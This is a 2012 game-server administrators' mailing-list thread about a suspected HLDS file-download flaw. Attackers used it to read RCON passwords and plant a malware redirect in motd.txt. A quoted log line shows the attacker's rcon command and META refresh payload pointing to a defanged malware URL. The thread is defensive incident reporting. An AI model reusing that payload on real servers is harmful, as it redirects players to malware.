Is this an ok practice? I never thought about having my rcon password in my file - I guess it would be more secure if you just start it up with the rcon password in the string? Doesn't it show up when you run top/htop though?
On Tue, Jul 3, 2012 at 12:05 PM, Ken Bateman <[email protected]> wrote: > For quite a while we have been careful to specify our tf2 rcon passwords on > the command line, not a config file, because we suspected the existence of > an exploit like this. > > It's possible that the vulnerability might be in tcadmin. > > -Ken > On Jul 3, 2012 2:54 PM, "c0m4r" <[email protected]> wrote: > > > There is an exploit in q3 engine named "q3dirtrav", which allows players > > to download any of server files, including server configuration > > (server.cfg).Today I found evidence of possible existence of the same > > exploit in HLDS.As a company we host hundreds of servers. We received > many > > reports from our customers about strange HTTP refresh meta tag in the > > motd.txt of their servers, which leads to "http *//free -leaks > > *com/cstrike*exe".The problem has affected several different servers, > > unrelated to each other, with very different RCON passwords (but most > were > > very strong).Here's what I have found in logfiles:Rcon from > > 178.123.103.201:15518:rcon 1399145428 XXXXXXXXXXXXXXXXXXX motd_write > > <META HTTP-EQUIV=Refresh CONTENT="0 URL=http *//free -leaks > > *com/cstrike*exe">This "cstrike.exe" contains some kind of a > > virus.(Note: I've replaced dot with asterisk and spaces)As you can see > the > > attacker knew the RCON password of each server.Then I found > > "server.CFG.ztmp" file in cstrike of each server, which was attacked.For > me > > that means that the attacker was able to download server.cfg exactly the > > same way as maps, models or sounds. > > _______________________________________________ > > To unsubscribe, edit your list preferences, or view the list archives, > > please visit: > > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: https://list.valvesoftware.com/cgi-bin/mailman/listinfo/hlds_linux
